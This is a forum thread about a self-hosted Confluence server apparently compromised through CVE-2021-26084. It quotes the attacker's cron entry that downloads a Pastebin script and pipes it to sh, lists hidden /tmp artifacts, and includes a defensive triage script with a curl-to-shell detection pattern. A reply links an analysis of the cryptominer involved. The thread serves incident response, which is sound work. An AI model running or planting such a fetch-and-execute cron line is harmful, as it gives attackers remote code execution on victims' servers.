Hello everyone,
we are self-hosting Confluence Server for our few users and noticed a crash of our instance last Friday (2021-09-10). Yesterday (2021-09-13) we discovered some suspicious processes on our server, seemingly started by the confluence user, that were taking up 100% CPU, causing both our Confluence and our Jira to crash again.
Based on our research so far and some Q/A that we read here, we are assuming that we were very likely hit by CVE-2021-26084 (https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html ) and that someone managed to inject malicious processes on our server. We immediately killed all processes of the confluence user (including Confluence itself) and found a cron job for the confluence user that pulls something down from Pastebin and executes it:
*/5 * * * * curl -fsSL https://pastebin.com/raw/<REDACTED> | sh
Besides that, we found suspicious files/folders in the /tmp directory which were used by the processes:
/tmp/.solr
/tmp/.kkli
/tmp/conf.n
Our checks for malicious activities or files are still ongoing. Obviously we are trying to take all necessary measures and find out whether and how much data from our Confluence itself was accessed.
Using the exploit named in the linked CVEs, is it possible that the attacker had access to actual content from our Confluence? Since the malicious processes were running under the confluence user, it would theoretically be possible that the attacker could read the database configuration and access the data, no? We couldn't really find information about that in the linked articles so far.
Thank you in advance for your help!
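For anyone triaging the same indicators (the curl-to-sh cron entry, dot-prefixed files in /tmp, CPU-hungry processes under the confluence account, and the question of whether the DB credentials were reachable), here is an added set of shell helpers that are not part of the post or of any Atlassian tooling. They assume a Linux host with GNU coreutils/procps, the default Confluence home path under /var/atlassian, and that they are run as root.

```shell
#!/bin/sh
# Triage helpers for the indicators described above (assumed: Linux with GNU
# coreutils/procps, default Confluence home path). Run as root.

# Print crontab lines that pipe a remote download straight into a shell
# (the "curl ... | sh" pattern seen above). Reads crontab text on stdin;
# returns 0 if at least one such line was found, 1 otherwise.
find_curl_pipe_sh() {
    grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' || return 1
}

# Check every local user's crontab plus the system cron files.
check_all_crontabs() {
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -l -u "$u" 2>/dev/null | find_curl_pipe_sh | sed "s/^/crontab[$u]: /"
    done
    cat /etc/crontab /etc/cron.d/* 2>/dev/null | find_curl_pipe_sh | sed 's/^/system cron: /'
}

# List dot-prefixed entries directly under a directory (e.g. /tmp/.solr),
# ignoring the X11/ICE/font sockets that legitimately live in /tmp.
list_hidden_tmp() {
    find "${1:-/tmp}" -mindepth 1 -maxdepth 1 -name '.*' \
        ! -name '.X11-unix' ! -name '.ICE-unix' ! -name '.font-unix' 2>/dev/null
}

# Top CPU consumers running as the given account (default: confluence).
top_procs_for_user() {
    ps -u "${1:-confluence}" -o pid=,pcpu=,etime=,args= --sort=-pcpu 2>/dev/null | head -n 10
}

# The DB connection settings live in confluence.cfg.xml in the Confluence home.
# The confluence account must be able to read that file, so anything running as
# that account could too: treat these credentials as exposed and rotate them.
show_db_config() {
    f="${1:-/var/atlassian/application-data/confluence/confluence.cfg.xml}"
    [ -f "$f" ] || { echo "not found: $f"; return 1; }
    ls -l "$f"
    grep -E 'hibernate\.connection\.(url|username)' "$f"
}

if [ "${RUN_TRIAGE:-0}" = 1 ]; then
    echo "== cron =="; check_all_crontabs
    echo "== hidden /tmp entries =="; list_hidden_tmp /tmp
    echo "== confluence processes by CPU =="; top_procs_for_user confluence
    echo "== db config =="; show_db_config
fi
```

Run it with `RUN_TRIAGE=1 sh triage.sh` to execute all checks; sourcing the file just defines the functions.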
We talked about the original exploit in this thread: https://community.atlassian.com/t5/Confluence-questions/No-access-to-Conlfuence-Webpage-100-CPU-usage-from-quot-dbused/qaq-p/1793393?utm_source=atlcomm&utm_medium=email&utm_campaign=immediate_general_answer&utm_content=topic
In it, one of the Community members gave some details about the original malware. It was a cryptocurrency miner. https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/
It's theoretically possible that data was accessed, but so far, these seem to be the adverse effects.